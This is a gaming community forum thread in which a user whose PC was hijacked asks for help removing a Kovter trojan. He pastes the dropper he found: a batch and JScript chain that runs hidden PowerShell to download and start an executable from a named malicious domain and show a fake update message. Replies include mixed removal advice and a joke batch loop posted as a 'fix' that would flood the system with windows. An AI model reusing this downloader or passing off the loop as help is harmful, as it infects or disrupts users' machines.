Login to ZARP
Username: Password: Remember me
  • Page:
  • 1
  • 2

TOPIC: Anyone good at computer security?

Anyone good at computer security? 6 years 3 months ago #995693

I came home yesterday to teamviewer opened and some giftcards purchased on my amazon account. I've reversed all charges and everything so that's all said and done. The only issue I'm having is cleaning my pc from whatever hit it.

The trojan was a kovter and I looked at its origin:

That made no sense to me seeing how it is 2018 and that is the only thing 4 antiviruses have found.

I checked it on virus total and got this: www.virustotal.com/#/file/b2aba101f2d9a7...faad83ba2c/detection

Now, this virus seemed to fuck with my registry and powershell. I am not experienced in any of that. If anyone knows anything about it, I will upload the contents of the virus here. (NOT THE VIRUS ITSELF, JUST THE STUFF IN THE FILE)
@echo off
echo a=new ActiveXObject('Wscript.Shell');a.run("PowerShell -WindowStyle Hidden $d=$env:temp+'\\ff327a5feb135015ae1bb140607f9ded.exe';(New-Object System.Net.WebClient).DownloadFile('https://yiomolibertyreserve.org/17/528.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK,[System.Windows.Forms.MessageBoxIcon]::Information)",0,false); >"%temp%\install_flash.js"
start /min "" wscript.exe "%temp%\install_flash.js"
DEL "%~f0

I found the file from 2016 in my google downloads folder from the same link from within the file. Now, I would never download something this stupid. That also means it was a forced download meant to look like a chrome update.


If ANYONE can offer some assistance on what that means I would be incredibly grateful. And if anyone knows of other affected areas of my pc based off of that that would also be helpful. I'll probably send someone $20 on steam or something if they can successfully help me out here. Thanks in advance.
  • collin4lizard
  • collin4lizard's Avatar
  • Offline
  • Senior Boarder
  • ZARP VIP Golden Blue Badge
  • Posts: 328
  • Thanks received: 64
  • Karma: 1
Login or register to post a reply.

Anyone good at computer security? 6 years 3 months ago #995700

Mr. Happy says that you have 3 trojan's on your pc, boot it in safemode and launch your antivirus
  • Windows
  • Windows's Avatar
  • Offline
  • Diamond Boarder
  • ZARP VIP
  • Life isn’t a destination, it’s hell
  • Posts: 3989
  • Thanks received: 963
  • Karma: -5
Login or register to post a reply.

Anyone good at computer security? 6 years 3 months ago #995701

what for antivirus you have?
  • Happy
  • Happy's Avatar
  • Offline
  • Expert Boarder
  • ZARP VIP
  • Dutch guy
  • Posts: 1315
  • Thanks received: 259
  • Karma: 0
Ranks:
-Ex Deathrun Admin
-Ex Community Council Member
-Ex SSRP Admin
-Ex Surf Moderator
-Ex Jailbreak Admin


Login or register to post a reply.

Anyone good at computer security? 6 years 3 months ago #995706

Happy wrote:
what antivirus do you have?

I got u!!
  • A Good Pianist
  • A Good Pianist's Avatar
  • Offline
  • Spectacular Boarder
  • ZARP VIP Golden Blue Badge
  • A Wob A Bob Bob
  • Posts: 15000
  • Thanks received: 3911
  • Karma: 22
Login or register to post a reply.

Anyone good at computer security? 6 years 3 months ago #995708

collin dm me on discord dog
  • 0yc37xrk6m
  • 0yc37xrk6m's Avatar
  • Offline
  • Adept Boarder
  • ZARP VIP Golden Blue Badge
  • Posts: 6727
  • Thanks received: 1994
  • Karma: 44
Login or register to post a reply.

Anyone good at computer security? 6 years 3 months ago #995711

Windows wrote:
Mr. Happy says that you have 3 trojan's on your pc, boot it in safemode and launch your antivirus

Been doing that for the past day and a half.
  • collin4lizard
  • collin4lizard's Avatar
  • Offline
  • Senior Boarder
  • ZARP VIP Golden Blue Badge
  • Posts: 328
  • Thanks received: 64
  • Karma: 1
Login or register to post a reply.

Anyone good at computer security? 6 years 3 months ago #995712

Happy wrote:
what for antivirus you have?

I was using malwarebytes, bitdefender, and windows defender for what it was worth.
  • collin4lizard
  • collin4lizard's Avatar
  • Offline
  • Senior Boarder
  • ZARP VIP Golden Blue Badge
  • Posts: 328
  • Thanks received: 64
  • Karma: 1
Login or register to post a reply.

Anyone good at computer security? 6 years 3 months ago #995713

Blocked wrote:
Download iobit unlocker > find wscript.exe > use iobit unlocker to force delete > find install_flash.js > use iobit unlocker to force delete > check task manager to see if there are any remaining shady looking processes or a process called wscript.exe > terminate the processes > restart PC > should be clean now

wscript.exe as in the one inside my system32?
  • collin4lizard
  • collin4lizard's Avatar
  • Offline
  • Senior Boarder
  • ZARP VIP Golden Blue Badge
  • Posts: 328
  • Thanks received: 64
  • Karma: 1
Login or register to post a reply.

Anyone good at computer security? 6 years 3 months ago #995717

Blocked wrote:
collin4lizard wrote:
Blocked wrote:
Download iobit unlocker > find wscript.exe > use iobit unlocker to force delete > find install_flash.js > use iobit unlocker to force delete > check task manager to see if there are any remaining shady looking processes or a process called wscript.exe > terminate the processes > restart PC > should be clean now

wscript.exe as in the one inside my system32?

okay, heres a more detailed explanation:

Download iobit unlocker > find ff327a5feb135015ae1bb140607f9ded.exe > use iobit unlocker to force delete > find 528.dat > use iobit unlocker to force delete > find install_flash.js > use iobit unlocker to force delete > check task manager to see if there are any remaining shady looking processes or a process called ff327a5feb135015ae1bb140607f9ded.exe > terminate the processes > restart PC > should be clean now

and to answer your question, no

I'm not seeing any of those files.
  • collin4lizard
  • collin4lizard's Avatar
  • Offline
  • Senior Boarder
  • ZARP VIP Golden Blue Badge
  • Posts: 328
  • Thanks received: 64
  • Karma: 1
Login or register to post a reply.

Anyone good at computer security? 6 years 3 months ago #995718

Put this inside a .bat file and run it to fix!!
:A
start
Goto A
  • bunnyslippers69
  • bunnyslippers69's Avatar
  • Offline
  • Diamond Boarder
  • ZARP VIP Golden Blue Badge
  • Posts: 3539
  • Thanks received: 1185
  • Karma: 0
Login or register to post a reply.

Anyone good at computer security? 6 years 3 months ago #995719

Bunnyslippers69 wrote:
Put this inside a .bat file and run it to fix!!
:A
start
Goto A

Goto makes spaghetti code B)
  • collin4lizard
  • collin4lizard's Avatar
  • Offline
  • Senior Boarder
  • ZARP VIP Golden Blue Badge
  • Posts: 328
  • Thanks received: 64
  • Karma: 1
Login or register to post a reply.

Anyone good at computer security? 6 years 3 months ago #995723

Nah, but in all seriousness it looks as though the files downloaded/ran themselves from the temp folder on your PC. You could try deleting the contents of the folder by pressing Win + R, typing %temp% and removing everything located inside. Nothing inside of that folder should matter to any program too much so you should be fine deleting it all.
  • bunnyslippers69
  • bunnyslippers69's Avatar
  • Offline
  • Diamond Boarder
  • ZARP VIP Golden Blue Badge
  • Posts: 3539
  • Thanks received: 1185
  • Karma: 0
Login or register to post a reply.

Anyone good at computer security? 6 years 3 months ago #995727

check registry, afaik since its from 2016 every antimalware/virus/whatever should clean it for you if not try running rkill and the symantec program
  • pigskin
  • pigskin's Avatar
  • Offline
  • User is blocked
  • ZARP VIP
  • uwu
  • Posts: 4807
  • Thanks received: 1440
  • Karma: -12
falling for the pink pill :OMEGALUL:
Login or register to post a reply.

Anyone good at computer security? 6 years 3 months ago #995745

Simple batch file
Warning: Spoiler! [ Click to expand ]

it runs a powershell thats hidden and abuses a bug to get an exe out of the temp folder (or maybe it just cancels the \ i dont remember) and runs this i belive ff327a5feb135015ae1bb140607f9ded.exe then it downloads a file from yiomolibertyreserve.org/17/528.dat and starts it and installs flash, wscript.exe has nothing to do with it i belive
  • ChikenGod
  • ChikenGod's Avatar
  • Offline
  • Gold Boarder
  • ZARP VIP
  • BiWx Vape still not implemented smh.
  • Posts: 1799
  • Thanks received: 271
  • Karma: -11
Login or register to post a reply.
The following user(s) said Thank You: dankek

Anyone good at computer security? 6 years 3 months ago #995748

Gamesys The Chiken God wrote:
Simple batch file
Warning: Spoiler! [ Click to expand ]

it runs a powershell thats hidden and abuses a bug to get an exe out of the temp folder (or maybe it just cancels the \ i dont remember) and runs this i belive ff327a5feb135015ae1bb140607f9ded.exe then it downloads a file from yiomolibertyreserve.org/17/528.dat and starts it and installs flash, wscript.exe has nothing to do with it i belive
^
  • dankek
  • dankek's Avatar
  • Offline
  • Banned
  • ZARP VIP
  • Legendary Retard
  • Posts: 2400
  • Thanks received: 997
  • Karma: 23
Login or register to post a reply.

Anyone good at computer security? 6 years 3 months ago #995750

EDIT: wscript is just is just windows script host, everything was in your temporary folder or 2 above it, use Malwarebytes and it should do the trick!
  • ChikenGod
  • ChikenGod's Avatar
  • Offline
  • Gold Boarder
  • ZARP VIP
  • BiWx Vape still not implemented smh.
  • Posts: 1799
  • Thanks received: 271
  • Karma: -11
Login or register to post a reply.

Anyone good at computer security? 6 years 3 months ago #995765

Let it go dowg it’s over.....

Take your pictures, videos and anything else that you need and out it on a flash drive then go to recovery and reset your pc with the files removed option. Now a days it takes five minutes at the most to restore a pc and you not only get rid of them stinky viruses you also get to feel good of having a clean pc.

You probably should stop downloading shit you have no idea about too because I can honestly tell you I’ve only ever had the windows anti virus installed for a couple years now and I’ve NEVER had a issue with dodgy processes, files or installations of programs including adware.
  • RedPowder
  • RedPowder's Avatar
  • Offline
  • Former Owner
  • ZARP VIP Golden Blue Badge
  • Posts: 4490
  • Thanks received: 3320
  • Karma: 214
Login or register to post a reply.
The following user(s) said Thank You: dankek

Anyone good at computer security? 6 years 3 months ago #995789

RedPowder wrote:
Let it go dowg it’s over.....

Take your pictures, videos and anything else that you need and out it on a flash drive then go to recovery and reset your pc with the files removed option. Now a days it takes five minutes at the most to restore a pc and you not only get rid of them stinky viruses you also get to feel good of having a clean pc.

You probably should stop downloading shit you have no idea about too because I can honestly tell you I’ve only ever had the windows anti virus installed for a couple years now and I’ve NEVER had a issue with dodgy processes, files or installations of programs including adware.

The file was downloaded over 2 years ago without my knowledge. The fact that I've made it this far not having downloaded (consensually) is pretty good. I could wipe everything and yeah, that would solve it all. But I'd rather not have to go through that if I can. That is why I posted wondering if anyone knew anything about it.
  • collin4lizard
  • collin4lizard's Avatar
  • Offline
  • Senior Boarder
  • ZARP VIP Golden Blue Badge
  • Posts: 328
  • Thanks received: 64
  • Karma: 1
Login or register to post a reply.

Anyone good at computer security? 6 years 3 months ago #995867

add me on discord Gamesys#9140
  • ChikenGod
  • ChikenGod's Avatar
  • Offline
  • Gold Boarder
  • ZARP VIP
  • BiWx Vape still not implemented smh.
  • Posts: 1799
  • Thanks received: 271
  • Karma: -11
Login or register to post a reply.
The following user(s) said Thank You: dankek

Anyone good at computer security? 6 years 3 months ago #995923

Gamesys The Chiken God wrote:
EDIT: wscript is just is just windows script host, everything was in your temporary folder or 2 above it, use Malwarebytes and it should do the trick!

Oh how wrong you are.
  • DEADMONSTOR
  • DEADMONSTOR's Avatar
  • Offline
  • Former Owner
  • ZARP VIP
  • Posts: 9277
  • Thanks received: 3799
  • Karma: 80
...
Login or register to post a reply.
  • Page:
  • 1
  • 2
Time to create page: 0.144 seconds

236 PLAYERS ONLINE

Connect to server View Gametracker DarkRP 1
12/127
online
Connect to server View Gametracker Deathrun
3/40
online
Connect to server View Gametracker TTT
0/47
online
Connect to server View Gametracker Bhop
1/32
online
Connect to server View Gametracker Surf
0/32
online
Connect to server View Gametracker Prop Hunt
0/42
online
Connect to server View Gametracker Sandbox
0/42
online
Connect to server Discord
220/914
online
Top